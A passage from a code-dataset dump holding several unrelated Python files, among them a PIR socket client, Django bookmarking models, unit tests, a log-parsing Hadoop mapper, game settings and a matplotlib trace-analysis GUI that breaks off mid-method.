self.clientWindowManager.showWarningPopUp(\"connection failed\",\"asdsfd\")\r\n\r\n self.t_SMConnection = threading.Thread(target = self.connect2SM, args=(aSMAddress,))\r\n self.t_SMConnection.setDaemon(True)\r\n self.t_SMConnection.start()\r\n \r\n \r\n \r\n def connect2SM(self,aSMAddress):\r\n self.logger.debug('creating socket')\r\n soc_serverManager = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.logger.debug('connecting to server')\r\n \r\n try:\r\n\r\n soc_serverManager.connect((aSMAddress, S_M_PORT))\r\n self.saveServerDetails((aSMAddress,S_M_PORT,soc_serverManager)) ##tuple format: (IP, PORT, Active Socket)\r\n\r\n self.sayHelloToSM()\r\n self.getDBLength()\r\n self.getSTDservers()\r\n \r\n self.clientWindowManager.enableScale() \r\n self.clientWindowManager.disableConnectBtn()\r\n except OSError: \r\n self.logger.debug('connection failed')\r\n \r\n\r\n ##TODO move this.\r\n# soc_serverManager.send(self.frameBuilder.getFrame()) ##\r\n# self.readSocketForResponse(soc_serverManager)\r\n def calacLengthSent(self,queryToSend):\r\n self.currentQueryLength = self.pirQuery.calacQuerySize()\r\n \r\n \r\n def pushServersAndQueriesToSendIntoQueue(self,queriesToSend):\r\n serversPool.queue.clear()\r\n serversQueryReply.clear()\r\n# while serversPool.qsize() != 0:\r\n# serversPool.get_nowait()\r\n self.verifyServersAlive()\r\n for serverIndex in range(0,active_servers.__len__()):\r\n queryAsString = pickle.dumps(queriesToSend[serverIndex])\r\n# self.logger.info(\"Pickle query: %s type: %s\",queryAsString,type(queryAsString))\r\n serversPool.put((active_servers[serverIndex][2],queryAsString))\r\n \r\n \r\n\r\n def executeQuery(self):\r\n \r\n \r\n self.pirQuery = PIRQueryObject(self.currentServersQuantity,self.DB_LENGTH)\r\n self.logger.info(\"Requested bit: %d\", self.clientWindowManager.getCurrentScaleNum())\r\n queryToSend = self.pirQuery.getPIRQuery(self.clientWindowManager.getCurrentScaleNum())\r\n self.calacLengthSent(queryToSend)\r\n# self.logger.info(\"query to send 0: %s\",queryToSend[0])\r\n# self.logger.info(\"query to send 1: %s\",queryToSend[1])\r\n\r\n self.pushServersAndQueriesToSendIntoQueue(queryToSend)\r\n for _ in queryToSend:\r\n# serverTuple = active_servers[targetServer]\r\n# avtiveTargetSocket = serverTuple[2]\r\n worker = Thread(target=self.sendQueries)\r\n# self.logger.info(\"Worker %s: created, connected to %s:%s\",worker.getName(),serverTuple[0],serverTuple[1])\r\n worker.setDaemon(True)\r\n worker.start()\r\n# worker.join()\r\n serversPool.join()\r\n# self.logger.info(\"All threads returned\")\r\n if(serversQueryReply.__len__() == active_servers.__len__()):\r\n self.logger.info(\"All servers replied to the query\")\r\n \r\n desiredBit = self.pirQuery.calculateQueryResult(serversQueryReply)\r\n self.logger.info(\"List of responses: %s\",serversQueryReply)\r\n\r\n self.clientWindowManager.writeResultToLabel(desiredBit)\r\n \r\n \r\n \r\n def verifyServersAlive(self):\r\n serversToRemovePool = []\r\n for (serverKey,(_,_,currentServer)) in active_servers.items():\r\n self.logger.info(\"Check server: %s alive\",serverKey)\r\n try:\r\n self.sayHelloToServer(currentServer)\r\n except Exception:\r\n self.logger.info(\"server: %s is not present, removed\",serverKey)\r\n serversToRemovePool.append(serverKey)\r\n for server2Remove in serversToRemovePool:\r\n del active_servers[server2Remove]\r\n \r\n def readSocketForResponse(self,runnigSocket):\r\n cur_thread = threading.currentThread()\r\n\r\n while True:\r\n # Echo the back to the client\r\n try:\r\n data = runnigSocket.recv(2)\r\n if data == '' or len(data) == 0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv failed opcode and num bytes of Length')\r\n break\r\n #Got data Successfully\r\n self.recvOpcode = data[0] #first byte is op code\r\n lengthOfSize = data[1]\r\n try:\r\n data = runnigSocket.recv(lengthOfSize)\r\n if data == '' or len(data) == 0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv data failed size')\r\n break\r\n size = int.from_bytes (data,byteorder='big')\r\n try:\r\n data = runnigSocket.recv(size)\r\n if data == '' or len(data) == 0:\r\n break\r\n except Exception: \r\n self.logger.debug('recv data failed payload')\r\n break\r\n self.payload = data\r\n self.logger.info(\"%s Received: %s %s\",cur_thread.getName(),self.recvOpcode,self.payload )\r\n self.reponseHandler(self.recvOpcode,self.payload)\r\n break\r\n \r\n def reponseHandler(self,recvOpcode,msg):\r\n self.code = OpCodes.getCode(self, self.recvOpcode)\r\n \r\n if self.code == 'hello_ack':\r\n self.logger.info (self.code)\r\n self.clientWindowManager.ServerConnected_icon()\r\n elif self.code == 'server_quantity_reply':\r\n self.logger.info (self.code)\r\n self.handleQuantityReply(msg)\r\n elif self.code == 'servers_up':\r\n self.logger.info (self.code)\r\n elif self.code == 'servers_failed':\r\n self.logger.info (self.code)\r\n elif self.code == 'db_length':\r\n self.logger.info (self.code)\r\n self.handleDBLengthReply(msg)\r\n elif self.code == 'pir_query_reply':\r\n self.logger.info (self.code)\r\n self.handleQueryReply(msg) \r\n elif self.code == 'std_query_reply':\r\n self.logger.info (self.code)\r\n self.handleQueryReply(msg)\r\n elif self.code == 'ip_and_port_reply':\r\n self.logger.info (self.code)\r\n self.handleIpAndPortReply(msg)\r\n else:\r\n self.logger.info(\"Bad opCode\") \r\n \r\n \r\n def sayHelloToSM(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('client_hello')[0],\"client says hello\")\r\n# self.frameBuilder.assembleFramePickle(codes.getValue('client_hello')[0],\"client says hello\")\r\n# self.logger.info(\"Say hello frame: %s \",self.frameBuilder.getFramePickle())\r\n self.sendAndHandleResponse(active_servers[0][2]) \r\n \r\n def sayHelloToServer(self,activeTargetSocket):\r\n self.frameBuilder.assembleFrame(codes.getValue('client_hello')[0],\"client says hello\")\r\n self.sendAndHandleResponse(activeTargetSocket) \r\n \r\n def getSTDservers(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('server_quantity_request')[0],\"server currentServersQuantity request\")\r\n self.sendAndHandleResponse(active_servers[0][2])\r\n \r\n def getDBLength(self):\r\n self.frameBuilder.assembleFrame(codes.getValue('db_length_request')[0],\"DB length request\")\r\n self.sendAndHandleResponse(active_servers[0][2])\r\n\r\n def sendQueries(self):\r\n t_frameBuilder = FrameBuilder()\r\n while True:\r\n# self.logger.info('%s Fetching socket from to queue ',threading.currentThread().getName())\r\n (targetSocket,query2Send) = serversPool.get(True)\r\n self.logger.info(\"length of query to send %d\",len(query2Send))\r\n# self.lock.acquire(blocking=True)\r\n t_frameBuilder.assembleFrame(codes.getValue('pir_query')[0],query2Send)\r\n# self.lock.release()\r\n targetSocket.send(t_frameBuilder.getFrame())\r\n self.readSocketForResponse(targetSocket)\r\n# self.sendAndHandleResponse(targetSocket)\r\n serversPool.task_done()\r\n \r\n def sendAndHandleResponse(self,activeSocket):\r\n activeSocket.send(self.frameBuilder.getFrame())\r\n# activeSocket.send(pickle.dump(self.frameBuilder.getFramePickle()),flags=0)\r\n self.readSocketForResponse(activeSocket)\r\n \r\n \r\n \r\n###############################################################################\r\n## Handling functions in this section ##\r\n############################################################################### \r\n def handleQuantityReply(self,msg):\r\n self.currentServersQuantity = int(msg)\r\n soc_serverManager = active_servers[0][2]\r\n for currentServer in range(1, self.currentServersQuantity):\r\n self.frameBuilder.assembleFrame(codes.getValue('ip_and_port_request')[0],str(currentServer))\r\n soc_serverManager.send(self.frameBuilder.getFrame())\r\n self.readSocketForResponse(soc_serverManager)\r\n self.currentServersQuantity = active_servers.__len__()\r\n \r\n def saveServerDetails(self,serverCredential):\r\n self.lock.acquire(blocking=True)\r\n active_servers[active_servers.__len__()] = serverCredential\r\n self.lock.release()\r\n \r\n def handleIpAndPortReply(self,msg):\r\n modifiedMsg = msg.decode('utf-8')\r\n try:\r\n index,stdIP,stdPort = modifiedMsg.split(':',3)\r\n except Exception: \r\n self.logger.debug('Bad ipAndPortRequest format')\r\n \r\n soc_stdServer=self.connect2Target((stdIP,int(stdPort)))\r\n self.sayHelloToServer(soc_stdServer) \r\n self.lock.acquire(blocking=True)\r\n active_servers[int(index)] = (stdIP,int(stdPort),soc_stdServer)\r\n self.lock.release()\r\n self.logger.debug('STD Server:%s on Port:%s was added in index:%s ', stdIP,stdPort,str(index))\r\n \r\n def handleQueryReply(self,msg):\r\n serversQueryReply.append(int(msg))\r\n \r\n def handleDBLengthReply(self,msg):\r\n modifiedMsg = msg.decode('utf-8')\r\n self.DB_LENGTH = int(modifiedMsg)\r\n self.clientWindowManager.configureDBScale(self.DB_LENGTH-1)\r\n self.logger.info('Data base size is updated to:%s',self.DB_LENGTH )\r\n\r\n def connect2Target(self,tu_address):\r\n self.logger.debug('creating socket connection to %s' , tu_address)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n s.connect(tu_address)\r\n return s\r\n# connectedFlag = True\r\n except Exception: \r\n self.logger.debug('connection to %s failed',tu_address)\r\n \r\n \r\n def setSMIPAdress(self,aIPAdress):\r\n pass\r\n \r\nif __name__ == \"__main__\":\r\n# logger = logging.getLogger('Client')\r\n root = Tk()\r\n appWindownManager = client_window(root)\r\n root.mainloop()\r\n# logger = logging.getLogger(\"Client computer\")\r\n# \r\n# # while True:\r\n# # sleep(1)\r\n# # self.logger.info(int(time.time()%1000000))\r\n# # \r\n# \r\n# s_c = ('123',344)\r\n# a_s = {1: ('123',344),2:('345',1254667)}\r\n# whatreturned = [ k for k, element in a_s.items() if element == s_c]\r\n# for key, element in a_s.items(): \r\n# self.logger.info(key,element)\r\n# \r\n# \r\n# \r\n# # p_bitstring = BitArray(hex(random.getrandbits(2**20)))\r\n# # logger.debug('BitArray s: %s' ,p_bitstring)\r\n# \r\n# frameBuilder = FrameBuilder()\r\n# ip, port = '192.168.4.1', 31101\r\n# # self.logger.info (codes.get_code(b'242'))\r\n# \r\n# logger.info('Server on %s:%s', ip, port)\r\n# \r\n# # Connect to the server\r\n# logger.debug('creating socket')\r\n# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# logger.debug('connecting to server')\r\n# connectedFlag = True\r\n# try:\r\n# s.connect((ip, port))\r\n# except Exception: \r\n# logger.debug('connection failed')\r\n# connectedFlag = False\r\n# frameBuilder.assembleFrame(codes.getValue('clientHello')[0],\"dfgsdf\")\r\n# s.send(frameBuilder.getFrame())\r\n# while connectedFlag:\r\n# \r\n# message = input(\"Enter your message to the EchoServer: \")\r\n# # self.logger.info (codes.getValue('db_length')[0])\r\n# frameBuilder.assembleFrame(codes.getValue('clientHello')[0],message)\r\n# # my_bytes.append(245)\r\n# # my_bytes.append(len(message))\r\n# # my_bytes.extend(str.encode(message))\r\n# logger.debug('sending data: \"%s\"', message)\r\n# len_sent = s.send(frameBuilder.getFrame())\r\n# # len_sent = s.send('240')\r\n# \r\n# # Receive a response\r\n# logger.debug('waiting for response')\r\n# response = s.recv(len_sent + len(threading.currentThread().getName()) + 3)\r\n# logger.debug('response from server: \"%s\"', response)\r\n# # self.logger.info('response from server: ', response.encode(\"utf-8\"))\r\n# sleep(0.05)\r\n# # connectedFlag = False\r\n# \r\n# # Clean up\r\n# logger.debug('closing socket')\r\n# s.close()\r\n# logger.debug('Client done')\r\n\r\n \r\n \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"173707354","text":"temperature_button = u\"\\U0001F321\" + \"Temperature\"\nget_status_button = u\"\\U0001F49A\" + \"Get Status\"\nset_status_button = u\"\\U0001F9E1\" + \"Set Status\"\nenable_hurt_button = u\"\\U0001F494\" + \"Enable Hurt\"\ndisable_hurt_button = u\"\\U00002764\" + \"Disable Hurt\"\nwallet_button = u\"\\U0001F4B0\" + \"Wallet\"\ndaily_zeit_button = u\"\\U0000231A\" + \"Daily Zeit\"\nget_photo_button = u\"\\U0001F4F8\" + \"Get Photo\"\nday_deal_button = u\"\\U0001F4B9\" + \"Day Deal\"\nweek_deal_button = u\"\\U0001F911\" + \"Week Deal\"\ngerman_button = u\"\\U0001F468\" + \"German\"\ndigitec_deal_button = u\"\\U0001F4BB\" + \"Digitec Deal\"\n\nback_button = u\"\\U0001F448\" + \" Back\"\nnext_button = u\"\\U0001F449\" + \" Next\"\n\nnot_enough_permissions = \"You are not authorized\"\nnot_yet_in_production = \"I'm sorry but this feature is not yet in production\"\n\nSTART_MENU_RESULT, SECOND_PAGE_RESULT, THIRD_PAGE_RESULT = range(3)\n","sub_path":"bin/utils/Constant.py","file_name":"Constant.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563630484","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport unittest\nimport tempfile\nimport netCDF4\n\nclass test_filepath(unittest.TestCase):\n\n def setUp(self):\n self.netcdf_file = os.path.join(os.getcwd(), \"netcdf_dummy_file.nc\")\n self.nc = netCDF4.Dataset(self.netcdf_file)\n\n def test_filepath(self):\n assert self.nc.filepath() == str(self.netcdf_file)\n\n def test_filepath_with_non_ascii_characters(self):\n python3 = sys.version_info[0] > 2\n if python3:\n encoding = 'utf-8'\n else:\n encoding = 'mbsc'\n # create nc-file in a filepath with Non-Ascii-Characters\n tempdir = tempfile.mkdtemp(prefix=u'ÄÖÜß_')\n filename = u\"Besançonalléestraße.nc\"\n nc_non_ascii_file = os.path.join(tempdir, filename)\n try:\n nc_non_ascii = netCDF4.Dataset(nc_non_ascii_file, 'w')\n except OSError:\n msg = u'cannot create file {} in folder {}\\n using encoding: {}'.format(\n tempdir, filename, encoding)\n raise OSError(msg)\n \n # test that no UnicodeDecodeError occur in the filepath() method\n msg = u'original: {}\\nfilepath: {}'.format(\n nc_non_ascii_file,\n nc_non_ascii.filepath())\n assert nc_non_ascii.filepath() == nc_non_ascii_file, msg\n \n # cleanup\n nc_non_ascii.close()\n os.remove(nc_non_ascii_file)\n os.rmdir(tempdir)\n \n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/tst_filepath.py","file_name":"tst_filepath.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349049968","text":"from django.db import models\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.http import urlquote\nfrom django.utils.translation import ugettext as _\n\nDEFAULT_VISITS = 0\n\nSTATUS_CHOICES = (\n (1, 'Inactive'),\n (2, 'Active'),\n)\n\nurl_help = \"\"\"\nNot a formal URL field. This accepts a string which will have string formatting operations performed on it. Valid key \nmappings for the string formatting includes:\n<ul>\n <li><strong>%(url)s</strong> Url to be provided to social bookmarking service</li>\n <li><strong>%(title)s</strong> Title of object being submitted to social bookmarking service</li> \n <li><strong>%(description)s</strong> Summary or description of the object being submitted</li> \n</ul>\n\"\"\"\n\nimage_help = \"\"\"\nBookmark image icon stored in media/social_bookmarking/img folder. Stored there so easier to install with fixtures.\"\n\"\"\"\n\njs_help = \"\"\"\nJavascript placed here will be inserted in the page in a <script></script> body. Lines will be stripped so make sure that \nyou end your lines of code correctly.\n\"\"\"\n\nclass BookmarkManager(models.Manager):\n \"\"\"\n QuerySet for all acive bookmarks.\n \"\"\"\n def get_active(self):\n return self.get_query_set().filter(status=2)\n\nclass Bookmark(models.Model):\n title = models.CharField(max_length=255, blank=False)\n slug = models.SlugField(_('slug'))\n status = models.IntegerField(choices=STATUS_CHOICES, default=2) \n description = models.CharField(max_length=255, blank=True, help_text=_(\"Because some things want it\"))\n url = models.CharField(blank=False, max_length=255, help_text=_(url_help))\n image = models.CharField(help_text=_(image_help), max_length=100, blank=False)\n js = models.TextField(help_text=_(js_help), blank=True)\n \n objects = BookmarkManager()\n \n class Meta:\n ordering = ('title',)\n\n def __unicode__(self):\n return unicode(self.title)\n\nclass BookmarkRelated(models.Model):\n content_type = models.ForeignKey(ContentType)\n object_id = models.PositiveIntegerField()\n content_object = generic.GenericForeignKey('content_type', 'object_id')\n bookmark = models.ForeignKey(Bookmark, blank=False, null=False)\n visits = models.IntegerField(_('visits'), default=DEFAULT_VISITS, editable=False)","sub_path":"social_bookmarking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"127509475","text":"from webservice import calculate_average, diagnosis, check_input\nimport pytest\nimport math\n\n\ndef test_calculate_average():\n\n output_1 = calculate_average([10, 20, 30])\n assert output_1 == 20\n\n output_2 = calculate_average([50, 76, 82, 99, 43, 46, 76, 35])\n assert output_2 == 63.375\n\n\ndef test_diagnosis():\n\n output_3 = diagnosis(120)\n assert output_3 == \"Tachycardia\"\n\n output_4 = diagnosis(100)\n assert output_4 == \"Normal\"\n\n output_5 = diagnosis(61)\n assert output_5 == \"Normal\"\n\n output_6 = diagnosis(45)\n assert output_6 == \"Bradycardia\"\n\n\ndef check_input():\n\n input_7 = {\n \"user_email\": \"suyash@suyashkumar.com\",\n \"user_age\": 50,\n \"heart_rate\": 100\n }\n\n output_7 = check_input(input_7)\n assert output_7 is True\n\n input_8 = {\n \"user_email\": \"suyash@suyashkumar.com\",\n \"user_age\": \"50\",\n \"heart_rate\": \"100\"\n }\n\n output_8 = check_input(input_8)\n assert output_8 is True\n\n input_9 = {\n \"user_age\": 50,\n \"heart_rate\": 100\n }\n\n with pytest.raises(KeyError):\n output_9 = check_input(input_9)\n\n assert output_9 is False\n\n input_10 = {\n \"user_email\": 45,\n \"user_age\": 50,\n \"heart_rate\": 100\n }\n\n output_10 = check_input(input_10)\n assert output_10 is False\n\n input_11 = {\n \"user_email\": \"suyash@suyashkumar.com\",\n \"user_age\": \"fifty\",\n \"heart_rate\": 100\n }\n\n with pytest.raises(ValueError):\n output_11 = check_input(input_11)\n assert output_11 is False\n\n input_12 = {\n \"user_email\": \"suyash@suyashkumar.com\",\n \"user_age\": 50,\n \"heart_rate\": math.sqrt(-100)\n }\n\n with pytest.raises(ValueError):\n output_12 = check_input(input_12)\n assert output_12 is False\n","sub_path":"test_webservice.py","file_name":"test_webservice.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169997906","text":"#!/usr/bin/python\n\n# %h is the IP address of the client\n# %l is identity of the client, or \"-\" if it's unavailable\n# %u is username of the client, or \"-\" if it's unavailable\n# %t is the time that the server finished processing the request. The format is [day/month/year:hour:minute:second zone]\n# %r is the request line from the client is given (in double quotes). It contains the method, path, query-string, and protocol or the request.\n# %>s is the status code that the server sends back to the client. You will see see mostly status codes 200 (OK - The request has succeeded), 304 (Not Modified) and 404 (Not Found). See more information on status codes in W3C.org\n# %b is the size of the object returned to the client, in bytes. It will be \"-\" in case of status code 304.\n#\n# 10.223.157.186 - - [15/Jul/2009:15:50:35 -0700] \"GET /assets/js/lowpro.js HTTP/1.1\" 200 10469\n# %h %l %u %t \\\"%r\\\" %>s %b\n\nimport sys\n\n\nclass CommonLogLine:\n\n def __init__(self, line):\n line = line.strip()\n\n self.ip = ''\n self.identity = ''\n self.username = ''\n self.timestamp = ''\n self.method = ''\n self.path = ''\n self.querystring = ''\n self.protocol = ''\n self.status = 0\n self.size = 0\n\n try:\n ini, end = line.split(' [', 1)\n except:\n return\n\n self.timestamp, end = end.split('] \"', 1) # timestamp\n self.ip, ini = ini.split(' ', 1) # ini -> identity + username\n\n request, end = end.split('\" ')\n try:\n request = request.split(' ') # ignore: \"LIMIT 0\"\n self.method = request[0]\n self.path = request[1]\n self.protocol = request[-1]\n except Exception as e:\n raise Exception(str(e), request, line)\n\n status, size = end.split(' ')\n self.status = int(status)\n self.size = 0 if size == '-' else int(size)\n\n def __str__(self):\n lst = []\n if any(self.ip):\n lst.append('ip=%s' % self.ip)\n if any(self.identity):\n lst.append('identity=%s' % self.identity)\n if any(self.username):\n lst.append('username=%s' % self.username)\n if any(self.timestamp):\n lst.append('ts=%s' % self.timestamp)\n if any(self.method):\n lst.append('method=%s' % self.method)\n if any(self.path):\n lst.append('path=%s' % self.path)\n if any(self.querystring):\n lst.append('qs=%s' % self.querystring)\n if any(self.protocol):\n lst.append('protocol=%s' % self.protocol)\n if self.status > 0:\n lst.append('status=%d' % self.status)\n if self.size > 0:\n lst.append('size=%d' % self.size)\n \n return ', '.join(lst)\n \n \nfor line in sys.stdin:\n\n line = CommonLogLine(line)\n if not line.path:\n continue\n\n print('{0}\\t1'.format(line.path))\n","sub_path":"courses/udacity/hadoop.and.mapreduce/project.01/part.02/01.hits.to.page/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"493844927","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 1 11:44:41 2016\n\n@author: pilgrim\n\"\"\"\n\nclass Settings():\n '''a clas to store all settings for alien invation'''\n def __init__(self):\n '''init game settings'''\n #screen settings\n self.scrn_width = 1200\n self.scrn_hgt = 800\n self.bgcolor = (0, 0, 81)\n #ship settings\n self.ship_speed = 1.5\n #bullet settings\n self.torpedo_speed = 1\n self.torpedo_width = 3\n self.torpedo_height = 15\n self.torpedo_color = (0, 204, 0)\n self.torpedo_number = 3\n self.comet_number = 5\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253152796","text":"from django.db.models.signals import post_save\n\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\n\ndef create_profile(sender, instance, created, **kw):\n if created:\n user = instance\n profile = Profile.objects.create(\n user=user,\n )\n\n\npost_save.connect(create_profile, sender=User)\n","sub_path":"users/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491207371","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 27 23:12:58 2019\n\n@author: iason\n\"\"\"\n\nimport numpy as np\nimport sys\n\nsys.path.append('../traceAnalysis - Ivo')\nimport traceAnalysisCode as analysis\nimport pandas as pd\nimport os\nimport itertools\nimport matplotlib.pyplot as plt\nimport matplotlib.widgets\nimport seaborn as sns\nfrom cursor_matplotlib import SnaptoCursor\n#plt.rcParams['toolbar'] = 'toolmanager'\n#from matplotlib.backend_tools import ToolBase\n#mainPath = r'D:\\ivoseverins\\SURFdrive\\Promotie\\Code\\Python\\traceAnalysis\\twoColourExampleData\\HJ A'\n\n\nclass InteractivePlot(object):\n def __init__(self, file):\n self.file = file\n self.mol_indx = 0 #From which molecule to start the analysis\n # See if there are saved analyzed molecules\n self.file.importExcel(filename=self.file.name+'_steps_data.xlsx')\n\n def plot_initialize(self):\n sns.set(style=\"dark\")\n sns.set_color_codes()\n plt.style.use('dark_background')\n self.fig, self.axes = plt.subplots(2, 1, sharex=True, figsize=(10,5))\n self.fig.canvas.set_window_title(f'Dataset: {self.file.name}')\n\n plt.subplots_adjust(bottom=0.23)\n\n # Create the axes for the widgets\n self.rax = plt.axes([0.91, 0.65, 0.08, 0.15])\n\n self.axcheckfret = plt.axes([0.91, 0.35, 0.08, 0.08])\n self.axcorred = plt.axes([0.95, 0.6, 0.028, 0.06])\n self.axcorgreen = plt.axes([0.95, 0.53, 0.028, 0.06])\n self.axcorrfretI = plt.axes([0.95, 0.3, 0.028, 0.06])\n self.axthrsliders = [plt.axes([0.26, 0.072, 0.10, 0.03]),\n plt.axes([0.26, 0.033, 0.10, 0.03])]\n # Create the buttons\n self.axthresb = plt.axes([0.1, 0.03, 0.13, 0.062]) # Button to calculate dwell times by thresholding\n self.axrejb = plt.axes([0.41, 0.03, 0.07, 0.062]) # Button to reject calculated dwell times by thresholding\n self.axclearb = plt.axes([0.51, 0.03, 0.11, 0.062]) # Button to clear the clicked points (clears vlines)\n self.axthrowb = plt.axes([0.64, 0.03, 0.11, 0.062]) # Button to throw away already calculated dwell times and de-select molecule\n self.axconclb = plt.axes([0.77, 0.03, 0.15, 0.062]) # Button to conlcude analysis by saving all the calculated steps and metadata\n\n self.axnextb = plt.axes([0.17, 0.90, 0.065, 0.062]) # Buttons to cycle through molecules\n self.axprevb = plt.axes([0.083, 0.90, 0.08, 0.062])\n [ax.set_frame_on(False) for ax in self.fig.get_axes()[2:]]\n # Radiobutton to select red or green\n self.radio = matplotlib.widgets.RadioButtons(self.rax, (\"red\", \"green\"))\n self.radio.circles[0].set_color(\"r\")\n for circle in self.radio.circles: # adjust radius here. The default is 0.05\n circle.set_radius(0.07)\n self.radio.on_clicked(self.radio_manage)\n\n # Connect clicking to draw lines class\n self.draw = Draw_lines(self.fig, self.radio)\n self.fig.canvas.mpl_connect('button_press_event', self.draw.onclick)\n # Create the buttons with\n\n bp = {'color': 'black', 'hovercolor': 'gray'}\n self.bauto = matplotlib.widgets.Button(self.axthresb,'autoThreshold' , **bp)\n self.bauto.on_clicked(self.autoThreshold_plot)\n self.brejauto = matplotlib.widgets.Button(self.axrejb,'reject' , **bp)\n self.brejauto.on_clicked(self.auto_reject)\n self.bclear = matplotlib.widgets.Button(self.axclearb,'clear clicks' , **bp)\n self.bclear.on_clicked(self.draw.clear_all)\n self.bthrow = matplotlib.widgets.Button(self.axthrowb,'throw away' , **bp)\n self.bthrow.on_clicked(self.throw_away)\n self.bconcl = matplotlib.widgets.Button(self.axconclb,'conclude analysis' , **bp)\n self.bconcl.on_clicked(self.conclude_analysis)\n self.bnext = matplotlib.widgets.Button(self.axnextb,'Next' , **bp)\n self.bnext.on_clicked(self.save_molecule)\n self.bprev = matplotlib.widgets.Button(self.axprevb,'Previous' , **bp)\n self.bprev.on_clicked(self.save_molecule)\n\n # A checkbutton for fret autothreshold dwell-time calculation\n self.checkbfret = matplotlib.widgets.CheckButtons(self.axcheckfret, [\"E fret\"],\n actives=[False])\n self.checkbfret.rectangles[0].set_color(\"black\")\n self.checkbfret.rectangles[0].set_height( 0.2)\n [line.remove() for line in self.checkbfret.lines[0]]\n self.checkbfret.on_clicked(self.check_fret)\n\n # Entryboxes for offset corrections\n corrdict = {'initial': str(0), 'color':'k', 'hovercolor': \"k\", 'label_pad':.2}\n corrlabels = [r'$I_{R_{off}}$', r'$I_{G_{off}}$', r'$I_{min}$']\n corraxes = [self.axcorred, self.axcorgreen, self.axcorrfretI]\n self.correntries = [matplotlib.widgets.TextBox(ax, label, **corrdict)\n for ax, label in zip(corraxes, corrlabels)]\n [entry.on_submit(lambda _: self.plot_molecule()) for entry in self.correntries]\n\n # Sliders for assigning the threshold\n self.thrsliders = []\n self.thrsliders.append(matplotlib.widgets.Slider(self.axthrsliders[0], label=r\"$I_R$\", valmin=0,\n valmax=500, valinit=100, valfmt=\"%i\", color=\"r\"))\n self.thrsliders.append(matplotlib.widgets.Slider(self.axthrsliders[1], label=r\"$E$\", valmin=0,\n valfmt=\"%.2f\", valinit=0.5, color=\"b\", valmax=1.0))\n [slider.vline.remove() for slider in self.thrsliders]\n\n self.fig.show()\n plt.pause(0.1)\n\n def plot_molecule(self, draw_plot=True):\n #clear the appropriate axes first\n [ax.clear() for ax in self.fig.get_axes()[:2]]\n # find the current molecule instance\n self.mol = self.file.molecules[self.mol_indx]\n\n # Check if molecule is selected\n if self.mol.isSelected: self.select_molecule(toggle=False)\n #load saved steps\n self.load_from_Molecule()\n # load kon if existing or assign a False 3x3 boolean\n self.prev_mol = self.file.molecules[self.mol_indx - 1]\n if all(kon is None for kon in [self.mol.kon_boolean, self.prev_mol.kon_boolean]):\n\n self.kon = np.zeros((3,3), dtype=bool)\n elif self.mol.kon_boolean is None:\n self.kon = np.copy(self.prev_mol.kon_boolean) # if no kon is defined for current molecule\n else:\n self.kon = self.mol.kon_boolean\n # update the edge color from self.kon:\n self.load_edges(load_fret=True)\n\n self.axes[0].set_title(f\"Molecule: {self.mol.index} /{len(self.file.molecules)}\")\n self.Iroff, self.Igoff, self.Imin = [float(c.text) for c in self.correntries]\n\n self.red = self.mol.I(1, Ioff=self.Iroff)\n self.green = self.mol.I(0, Ioff=self.Igoff)\n self.fret = self.mol.E(Imin=self.Imin)\n self.exp_time = self.file.exposure_time\n self.time = np.arange(0,len(self.red)*self.exp_time, self.exp_time)\n\n if not draw_plot:\n return\n\n self.axes[0].plot(self.time, self.green, \"g\", lw=.75)\n self.axes[0].plot(self.time, self.red, \"r\", lw=.75)\n\n self.axes[1].plot(self.time, self.fret, \"b\", lw=.75)\n self.axes[1].set_ylim((0,1.1))\n self.axes[1].set_xlim((-10, self.time[-1]))\n self.axes[1].set_xlabel(\"time (s)\")\n # vertical lines to indicate the threshold in the two axes\n self.slidel = [ax.axhline(0, lw=1, ls=\":\", zorder=3, visible=False) for ax in self.axes]\n # Creat cursor particular to the molelcule and connect it to mouse movement event\n self.cursors = []\n self.cursors.append(SnaptoCursor(self.axes[0], self.time, self.red))\n self.cursors.append(SnaptoCursor(self.axes[0], self.time, self.green))\n self.cursors.append(SnaptoCursor(self.axes[1], self.time, self.fret))\n self.connect_events_to_canvas()\n self.fig.canvas.draw()\n plt.pause(0.1)\n\n def connect_events_to_canvas(self):\n self.fig.canvas.mpl_connect('key_press_event', self.key_bind)\n self.fig.canvas.mpl_connect('motion_notify_event', self.mouse_cursor)\n for cursor in self.cursors:\n self.fig.canvas.mpl_connect('axes_leave_event', cursor.leave_axis)\n self.fig.canvas.mpl_connect('axes_leave_event',\n lambda _: [[self.slidel[i].set_visible(False), self.fig.canvas.draw()] for i in [0,1]])\n\n def key_bind(self, event):\n k = 